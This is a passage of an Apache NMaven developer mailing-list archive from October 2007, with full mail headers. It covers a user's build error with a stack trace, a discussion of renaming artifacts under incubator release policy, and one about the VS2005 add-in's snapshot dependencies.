Mistroni <[email protected]> wrote: > > hi all, > not sure if this is the right mailing list but when i browse i found just > this one, plus the commit one, plus the private one > I am Marco, i have been using java mvn for about 3 years, now i started to > do some C# coding and i found out that with NMaven > i can build app in C# in same way i am using for java. > > i have downloaded nmaven, and built my first project, however when i > compile > i am getting this exception > > ************ EXCEPTION *************************** > at org.codehaus.classworlds.Launcher.main(Launcher.java:375) > [INFO] > ------------------------------------------------------------------------ > [ERROR] BUILD ERROR > [INFO] > ------------------------------------------------------------------------ > [INFO] NMAVEN-180-020: Problem in resolving artifact: Assembly Artifact Id > = > NMa > ven.Plugin.Loader, Type = exe, Local Path Check = C:\Documents and > Settings\Marc > o > > Mistroni\.m2\uac\gac_msil\NMaven.Plugin.Loader\0.14-SNAPSHOT__NMaven.Plugin\NM > aven.Plugin.Loader.exe, Message = Unable to download the artifact from any > repos > itory > [INFO] > ------------------------------------------------------------------------ > [DEBUG] Trace > org.apache.maven.lifecycle.LifecycleExecutionException: NMAVEN-180-020: > Problem > in resolving artifact: Assembly Artifact Id = NMaven.Plugin.Loader, Type = > exe, > Local Path Check = C:\Documents and Settings\Marco > Mistroni\.m2\uac\gac_msil\NMa > ven.Plugin.Loader\0.14-SNAPSHOT__NMaven.Plugin\NMaven.Plugin.Loader.exe, > Message > = Unable to download the artifact from any repository > at org.apache.maven.lifecycle.DefaultLifecycleExecutor.executeGoals > (Defa > ultLifecycleExecutor.java:564) > at > org.apache.maven.lifecycle.DefaultLifecycleExecutor.executeGoalWithLi > fecycle(DefaultLifecycleExecutor.java:480) > at org.apache.maven.lifecycle.DefaultLifecycleExecutor.executeGoal > (Defau > ltLifecycleExecutor.java:459) > at > org.apache.maven.lifecycle.DefaultLifecycleExecutor.executeGoalAndHan > dleFailures(DefaultLifecycleExecutor.java:311) > at > org.apache.maven.lifecycle.DefaultLifecycleExecutor.executeTaskSegmen > ts(DefaultLifecycleExecutor.java:278) > at org.apache.maven.lifecycle.DefaultLifecycleExecutor.execute > (DefaultLi > fecycleExecutor.java:143) > at org.apache.maven.DefaultMaven.doExecute(DefaultMaven.java :334) > at org.apache.maven.DefaultMaven.execute(DefaultMaven.java:125) > at org.apache.maven.cli.MavenCli.main(MavenCli.java:280) > at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) > at sun.reflect.NativeMethodAccessorImpl.invoke > (NativeMethodAccessorImpl. > java:39) > at sun.reflect.DelegatingMethodAccessorImpl.invoke > (DelegatingMethodAcces > sorImpl.java:25) > at java.lang.reflect.Method.invoke (Method.java:585) > at org.codehaus.classworlds.Launcher.launchEnhanced(Launcher.java > :315) > at org.codehaus.classworlds.Launcher.launch(Launcher.java:255) > at org.codehaus.classworlds.Launcher.mainWithExitCode ( > Launcher.java > :430) > > at org.codehaus.classworlds.Launcher.main(Launcher.java:375) > Caused by: org.apache.maven.plugin.MojoExecutionException: NMAVEN-180-020: > Probl > em in resolving artifact: Assembly Artifact Id = NMaven.Plugin.Loader, > Type > = ex > e, Local Path Check = C:\Documents and Settings\Marco > Mistroni\.m2\uac\gac_msil\ > NMaven.Plugin.Loader\0.14-SNAPSHOT__NMaven.Plugin\NMaven.Plugin.Loader.exe > , > Mess > age = Unable to download the artifact from any repository > at > org.apache.maven.dotnet.plugin.resolver.NetDependencyResolverMojo.exe > cute(NetDependencyResolverMojo.java:166) > at org.apache.maven.plugin.DefaultPluginManager.executeMojo > (DefaultPlugi > nManager.java:443) > at org.apache.maven.lifecycle.DefaultLifecycleExecutor.executeGoals > (Defa > ultLifecycleExecutor.java:539) > ... 16 more > [INFO] > ------------------------------------------------------------------------ > [INFO] Total time: 10 seconds > [INFO] Finished at: Sun Oct 21 15:38:07 BST 2007 > [INFO] Final Memory: 7M/15M > [INFO] > ------------------------------------------------------------------------ > > > ********* here's my pom.xml .. generated by nmaven when i created the > archetype ************** > <?xml version="1.0" encoding="UTF-8"?> > > <project xmlns:xsi=" http://www.w3.org/2001/XMLSchema-instance" > xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 > http://maven.apache.org/maven-v4_0_0.xsd "> > <modelVersion>4.0.0</modelVersion> > <groupId>MyCSharp</groupId> > <artifactId>MyCSsharp</artifactId> > <version>0.14-SNAPSHOT</version> > <packaging>library</packaging> > <build> > <sourceDirectory>src/main/csharp</sourceDirectory> > <testSourceDirectory>src/test/csharp</testSourceDirectory> > <plugins> > <plugin> > <groupId> org.apache.maven.dotnet.plugins</groupId> > <artifactId>maven-compile-plugin</artifactId> > <extensions>true</extensions> > </plugin> > </plugins> > </build> > </project> > > > > could anyone help me out? > > thanks in advance and regards > Marco > ------=_Part_6583_25288080.1192982318730-- From [email protected] Wed Oct 24 19:47:37 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 68915 invoked from network); 24 Oct 2007 19:47:37 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Oct 2007 19:47:37 -0000 Received: (qmail 72845 invoked by uid 500); 24 Oct 2007 19:47:24 -0000 Delivered-To: [email protected] Received: (qmail 72829 invoked by uid 500); 24 Oct 2007 19:47:24 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <nmaven-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 72820 invoked by uid 99); 24 Oct 2007 19:47:24 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 24 Oct 2007 12:47:24 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO rv-out-0910.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 24 Oct 2007 19:47:28 +0000 Received: by rv-out-0910.google.com with SMTP id k20so276619rvb for <[email protected]>; Wed, 24 Oct 2007 12:47:06 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type; bh=n7hhqBbOrXt81BpHspOYiGCSQgL/DElfwbqWUJ5SQOw=; b=Dodcr4Wn6VPdOZ3uvrtMcqOspNH+mUzOmLWBTsPK9mIGUAIiUR5YnWjyI5/2Pzsle3xT8STy8lfMhqbl0UpZTbXgdKg9FgNrkHOhEa1tpZKP5awN1omnj+b4XwC03+jG17M413l682B6MYAdih2lWu13DDROezX1WSSQ9T9fAfI= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:mime-version:content-type; b=P7IkWotCte2taxWYFsYXesyiplklsmA8AZTpsaGExa6yTomyws5RkFjfcSlIH/sZjutllHDsgntKRMXM6lx65dz4hgI68KeHIjknjvFYNkMlwEkrr9aC8k+UVqCTOQLuB1x1m6tlRe57MaiK1jcLb79VJ685+ZIqmuENSOr3az8= Received: by 161.129.204.104 with SMTP id u5mr489926rvo.1193255226767; Wed, 24 Oct 2007 12:47:06 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Wed, 24 Oct 2007 12:47:06 -0700 (PDT) Message-ID: <[email protected]> Date: Wed, 24 Oct 2007 12:47:06 -0700 From: "Shane Isbell" <[email protected]> To: [email protected] Subject: Renaming Artifacts MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_4065_8116382.1193255226774" X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_4065_8116382.1193255226774 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline According to the incubator release policy ( http://incubator.apache.org/guides/releasemanagement.html), the artifact file names should contain both (1) incubating and (2) the podling name. I recall that when first importing the project into Apache, we decided on using dotnet in the artifact name (dotnet-artifact, dotnet-core, and so on) since the "nmaven" is unlikely to survive upon moving into Maven core. To follow the release policy, we would need to do something like: "nmaven-artifact-incubating" or "nmaven-dotnet-artifact-incubating". My feeling is that having both nmaven and dotnet is a bit redundent. From chatting with Brett, it looks as though we can just include incubating within the version, at least for the java artifacts. In regards to the .NET assembly file names, they currently follow the form: NMaven.Artifact, NMaven, Logging, and so on. Since version is not in the file name, it would require placing "incubating" within in the artifact name: NMaven.Artifact.Incubating. We need to decide on the naming for both the java and .NET artifacts. Thoughts? Shane ------=_Part_4065_8116382.1193255226774-- From [email protected] Wed Oct 24 21:07:02 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 91127 invoked from network); 24 Oct 2007 21:07:02 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Oct 2007 21:07:02 -0000 Received: (qmail 75842 invoked by uid 500); 24 Oct 2007 21:06:49 -0000 Delivered-To: [email protected] Received: (qmail 75826 invoked by uid 500); 24 Oct 2007 21:06:49 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <nmaven-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 75817 invoked by uid 99); 24 Oct 2007 21:06:49 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 24 Oct 2007 14:06:49 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO wx-out-0506.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 24 Oct 2007 21:06:53 +0000 Received: by wx-out-0506.google.com with SMTP id h30so336415wxd for <[email protected]>; Wed, 24 Oct 2007 14:06:32 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; bh=U5eeMG9aUtn7LUz+L+eK3EM4O7WS6vrnaFzJFp872Vw=; b=X0AI6ozhE45YaBswR58+XFcC3P3ol+VnTlSCeNWvEHcM/jsvyn1RA0CB+DU8yuo3iSCoC/S934cQv4NZJZsWeQbLRha1aPjhwDnZGMpaM5CtymhJ5NTYXTnK+yf6vr4PXoTg6iRNCj777sxv+S2hXjRP9ci5Dq6oAGgmopCr5cY= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=Mgz+Xh3aYjOQppBqRiFi+W3Ccs6+N46U9k0eQaQ5WUJb8NLwQ7e058e9X5fR/i6rPDcyphHpHSyhudQnyGKjp5XYwQIpRMCln8bmo5zmsWobf9zXm56DQwzvlSD/B9Jm+URY+XhjyajUycdeMMmooU+jyONXsbYUKynyfN2VUxk= Received: by 161.129.204.104 with SMTP id c18mr852428agc.1193259992109; Wed, 24 Oct 2007 14:06:32 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Wed, 24 Oct 2007 14:06:32 -0700 (PDT) Message-ID: <[email protected]> Date: Wed, 24 Oct 2007 14:06:32 -0700 From: "Evan Worley" <[email protected]> To: [email protected] Subject: Re: Renaming Artifacts In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_10508_7522607.1193259992098" References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_10508_7522607.1193259992098 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline +1 for the nmaven prefix. Akin to maven-compile-plugin would be nmaven-compile-plugin. I was confused previously when seeing the same artifact id between nmaven and maven with a different group id. -Evan On 10/24/07, Shane Isbell <[email protected]> wrote: > > According to the incubator release policy ( > http://incubator.apache.org/guides/releasemanagement.html), the artifact > file names should contain both (1) incubating and (2) the podling name. I > recall that when first importing the project into Apache, we decided on > using dotnet in the artifact name (dotnet-artifact, dotnet-core, and so > on) > since the "nmaven" is unlikely to survive upon moving into Maven core. To > follow the release policy, we would need to do something like: > "nmaven-artifact-incubating" or "nmaven-dotnet-artifact-incubating". My > feeling is that having both nmaven and dotnet is a bit redundent. From > chatting with Brett, it looks as though we can just include incubating > within the version, at least for the java artifacts. > > In regards to the .NET assembly file names, they currently follow the > form: > NMaven.Artifact, NMaven, Logging, and so on. Since version is not in the > file name, it would require placing "incubating" within in the artifact > name: NMaven.Artifact.Incubating. > > We need to decide on the naming for both the java and .NET artifacts. > Thoughts? > > Shane > ------=_Part_10508_7522607.1193259992098-- From [email protected] Wed Oct 24 21:15:12 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 93842 invoked from network); 24 Oct 2007 21:15:11 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Oct 2007 21:15:11 -0000 Received: (qmail 83432 invoked by uid 500); 24 Oct 2007 21:14:59 -0000 Delivered-To: [email protected] Received: (qmail 83405 invoked by uid 500); 24 Oct 2007 21:14:59 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <nmaven-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 83394 invoked by uid 99); 24 Oct 2007 21:14:59 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 24 Oct 2007 14:14:59 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO rv-out-0910.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 24 Oct 2007 21:15:03 +0000 Received: by rv-out-0910.google.com with SMTP id k20so297612rvb for <[email protected]>; Wed, 24 Oct 2007 14:14:42 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; bh=S0PPcCaHXdBsolenYbak9tjrjojJp3ydkcuDZx8MwlA=; b=GYc7oZlR/9g2rVbcnA/2Je+u3cW2X8OVshukZbd3BmweW7P7z3seWcIPufxoDaynBkHpBD5JPuanYx1mEpXzK+prtQi3i4laaQwP1lmhUQd66F1JpOUfE3YcvONiQnTIjsSKbSdaESLZRxXwHQeH+MFqkmtnB96QDEIEv/oJCcA= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=dHcT6DSNyG+OsHpuiPdjvi6ulAsFM1NAQCfDnGWQ/ylAMh5Sfg/u5bSBL4biu7bWQ5DfyEUojAzkZML2BtcXj6R4xLM3Yb4+BkJiliq4uEJt3BGJGU+r/8bsOa5kQJPSrxf8qz9/IeCSG/GjMgNkNyPgINUqJ2ea6btGt5vO478= Received: by 161.129.204.104 with SMTP id q6mr536847rvm.1193260482085; Wed, 24 Oct 2007 14:14:42 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Wed, 24 Oct 2007 14:14:42 -0700 (PDT) Message-ID: <[email protected]> Date: Wed, 24 Oct 2007 14:14:42 -0700 From: "Shane Isbell" <[email protected]> To: [email protected] Subject: Re: Renaming Artifacts In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_4357_7004076.1193260482089" References: <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_4357_7004076.1193260482089 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline Right, I forgot about the plugins. I think we would need to do maven-nmaven-compile-plugin, which is goofy (and will only get goofier when we add "incubating" version), but we have two conventions to follow: 1) incubator and 2) maven plugin naming convention, which starts with "maven" and ends with "plugin". Shane On 10/24/07, Evan Worley <[email protected]> wrote: > > +1 for the nmaven prefix. Akin to maven-compile-plugin would be > nmaven-compile-plugin. I was confused previously when seeing the same > artifact id between nmaven and maven with a different group id. > > -Evan > > On 10/24/07, Shane Isbell <[email protected]> wrote: > > > > According to the incubator release policy ( > > http://incubator.apache.org/guides/releasemanagement.html), the artifact > > file names should contain both (1) incubating and (2) the podling name. > I > > recall that when first importing the project into Apache, we decided on > > using dotnet in the artifact name (dotnet-artifact, dotnet-core, and so > > on) > > since the "nmaven" is unlikely to survive upon moving into Maven core. > To > > follow the release policy, we would need to do something like: > > "nmaven-artifact-incubating" or "nmaven-dotnet-artifact-incubating". My > > feeling is that having both nmaven and dotnet is a bit redundent. From > > chatting with Brett, it looks as though we can just include incubating > > within the version, at least for the java artifacts. > > > > In regards to the .NET assembly file names, they currently follow the > > form: > > NMaven.Artifact, NMaven, Logging, and so on. Since version is not in the > > file name, it would require placing "incubating" within in the artifact > > name: NMaven.Artifact.Incubating. > > > > We need to decide on the naming for both the java and .NET artifacts. > > Thoughts? > > > > Shane > > > ------=_Part_4357_7004076.1193260482089-- From [email protected] Fri Oct 26 17:11:05 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 5289 invoked from network); 26 Oct 2007 17:11:05 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Oct 2007 17:11:05 -0000 Received: (qmail 82478 invoked by uid 500); 26 Oct 2007 17:10:53 -0000 Delivered-To: [email protected] Received: (qmail 82468 invoked by uid 500); 26 Oct 2007 17:10:52 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <nmaven-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 82459 invoked by uid 99); 26 Oct 2007 17:10:52 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 26 Oct 2007 10:10:52 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO nz-out-0506.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 26 Oct 2007 17:10:56 +0000 Received: by nz-out-0506.google.com with SMTP id o37so835048nzf for <[email protected]>; Fri, 26 Oct 2007 10:10:22 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type; bh=rkIKGA5AHLWE69V8KS0+L+EePciX/uU2J/QLTw+He1I=; b=LRalaMUjwTQJvWg0JW44+Lil2yx8d8LVLTmyhM8cgb4Oi8wLm/fnGx7rZGLmY2bisUixIfR7eT3Eo139EOIUPwnLN9Q9ncKt9rs9PxWawxdtfRb7DstYtqHCpbyIRh6w/XAoaW/H67/iMxvy0m5MAsrEfsgVnGrJvvqS25ZyD1U= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:mime-version:content-type; b=DxU1s0qk3iI9jINnM6eauDsoIrxI/aEZWYcuTePKYxJg1L2vx2qlH2kiMoyOlQVYqo8JI1DXTA/aQiT3IrMrunyN0HJtOQh92EjCI/hzfPEseei9Kwxg/0Q/HIVT8UXPGVKKAY5TRHDIYlOb4RAzjklYUsFRmyGsRDy9JieGDsA= Received: by 161.129.204.104 with SMTP id s6mr1640346rvm.1193418621524; Fri, 26 Oct 2007 10:10:21 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Fri, 26 Oct 2007 10:10:21 -0700 (PDT) Message-ID: <[email protected]> Date: Fri, 26 Oct 2007 10:10:21 -0700 From: "Shane Isbell" <[email protected]> To: [email protected] Subject: Snapshot Dependency MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_4359_15470395.1193418621515" X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_4359_15470395.1193418621515 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline The VS2005 addin and associated components require Maven snapshot dependencies, which is a problem for doing an NMaven release. One thought I had was to disable any IDE components and then do a release. These components which have the snapshot dependencies are included under the VS2005 profile anyway, so it would be just doing a default build. Thoughts? Shane ------=_Part_4359_15470395.1193418621515-- From [email protected] Fri Oct 26 19:31:35 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 49056 invoked from network); 26 Oct 2007 19:31:35 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Oct 2007 19:31:35 -0000 Received: (qmail 35132 invoked by uid 500); 26 Oct 2007 19:31:22 -0000 Delivered-To: [email protected] Received: (qmail 35109 invoked by uid 500); 26 Oct 2007 19:31:22 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <nmaven-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 35100 invoked by uid 99); 26 Oct 2007 19:31:22 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 26 Oct 2007 12:31:22 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO wr-out-0506.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 26 Oct 2007 19:31:26 +0000 Received: by wr-out-0506.google.com with SMTP id c48so716359wra for <[email protected]>; Fri, 26 Oct 2007 12:31:05 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; bh=82b9UsoKvggwnhIxB51WFCv8bvHtKHv8dedrFnDxKXk=; b=UFG+I8DLRrG7rJ5GGxH4ogMSC63Bq2/kq74xo8VtV/Yz9QN83DrM8hUw8tk+ubjA4R84K6kCDCR8/6jhwwVHYy5arOIeNvw/rrgrUgZZaY80iv4oaWu1dgciNsH/E87kowQ83VG3S3wvLCBkeoh5A4Uc+wUCS8SJJxOoxpZ6L2g= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=lWts9xNg711iMzjHJ/fL9RXvlcLcnpBSlOcprlAt+MUXRKdkvCGJ0cHH8dzqoAwbuXnIXPrCIAPSqcOMdXO/915gqATM7h+IBcpx+LpywcLGuqSHiNE5S3a+b6XRTQkWjahC9tEWcNM+IJrtcYimFcviygqs1RUETgO0fNQSDs0= Received: by 161.129.204.104 with SMTP id k5mr2704882agb.1193427064799; Fri, 26 Oct 2007 12:31:04 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Fri, 26 Oct 2007 12:31:04 -0700 (PDT) Message-ID: <[email protected]> Date: Fri, 26 Oct 2007 12:31:04 -0700 From: "Evan Worley" <[email protected]> To: [email protected] Subject: Re: Snapshot Dependency In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_7546_17735274.1193427064787" References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_7546_17735274.1193427064787 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline Do they associated components need shapshot dependencies? Or is there a stable version they can depend on? -Evan On 10/26/07, Shane Isbell <[email protected]> wrote: > > The VS2005 addin and associated components require Maven snapshot > dependencies, which is a problem for doing an NMaven release. One thought > I > had was to disable any IDE components and then do a release. These > components which have the snapshot dependencies are included under the > VS2005 profile anyway, so it would be just doing a default build. > Thoughts? > > Shane > ------=_Part_7546_17735274.1193427064787-- From [email protected] Fri Oct 26 19:42:17 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 51170 invoked from network); 26 Oct 2007 19:42:17 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Oct 2007 19:42:17 -0000 Received: (qmail 49929 invoked by uid 500); 26 Oct 2007 19:42:05 -0000 Delivered-To: [email protected] Received: (qmail 49886 invoked by uid 500); 26 Oct 2007 19:42:04 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <nmaven-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 49868 invoked by uid 99); 26 Oct 2007 19:42:04 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 26 Oct 2007 12:42:04 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO rv-out-0910.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 26 Oct 2007 19:42:08 +0000 Received: by rv-out-0910.google.com with SMTP id k20so905761rvb for <[email protected]>; Fri, 26 Oct 2007 12:41:47 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; bh=a2K8AsNLtKc4kwJunhUr7eDD30U1jQokLtUxL3VGCis=; b=EQAXX/LZ6mXcfZhZXpibqgYYffcgyqhfxh6AbEmfxtDVjD8rG778psP5DGQsOWv6obQ7nLYhBvL25q+nXOWUbNpcEGkxrtGaGQIwvOkXXhHRUvwOVTQVKMWqpFVSVOtwcTZ9l663tQ6/hKoGjwrsGxDIx1cYSHSfANBHK1kGOd8= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=keWFZlsPgOYr3UjYgcgeGDA60CxM8FM4kZok8K9wbus9POBeIXRwIArRW6NseEsF9BDnd3sesR8woTBCGUr9QsZ1T0DvYPXbOxFwelH/WPHKL32Ff1/82UK0dqXGODcFSL3afz2NK1jpBCa8MSeEmJTJvcajWUbAQo4M1ukbqo0= Received: by 161.129.204.104 with SMTP id e5mr1728329rvk.1193427707288; Fri, 26 Oct 2007 12:41:47 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Fri, 26 Oct 2007 12:41:20 -0700 (PDT) Message-ID: <[email protected]> Date: Fri, 26 Oct 2007 12:41:20 -0700 From: "Shane Isbell" <[email protected]> To: [email protected] Subject: Re: Snapshot Dependency In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_4733_20222392.1193427680388" References: <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_4733_20222392.1193427680388 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline The VS2005 addin uses the Maven embedder from Maven 2.1-SNAPSHOT. The embedder from 2.0.x doesn't work, so there is no release version that we can use. Shane On 10/26/07, Evan Worley <[email protected]> wrote: > > Do they associated components need shapshot dependencies? Or is there a > stable version they can depend on? > > -Evan > > On 10/26/07, Shane Isbell <[email protected]> wrote: > > > > The VS2005 addin and associated components require Maven snapshot > > dependencies, which is a problem for doing an NMaven release. One > thought > > I > > had was to disable any IDE components and then do a release. These > > components which have the snapshot dependencies are included under the > > VS2005 profile anyway, so it would be just doing a default build. > > Thoughts? > > > > Shane > > > ------=_Part_4733_20222392.1193427680388-- From [email protected] Fri Oct 26 19:43:02 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 51379 invoked from network); 26 Oct 2007 19:43:02 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Oct 2007 19:43:02 -0000 Received: (qmail 50727 invoked by uid 500); 26 Oct 2007 19:42:50 -0000 Delivered-To: [email protected] Received: (qmail 50680 invoked by uid 500); 26 Oct 2007 19:42:49 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <nmaven-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 50671 invoked by uid 99); 26 Oct 2007 19:42:49 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 26 Oct 2007 12:42:49 -0700 X-ASF-Spam-Status: No, hits=2.0 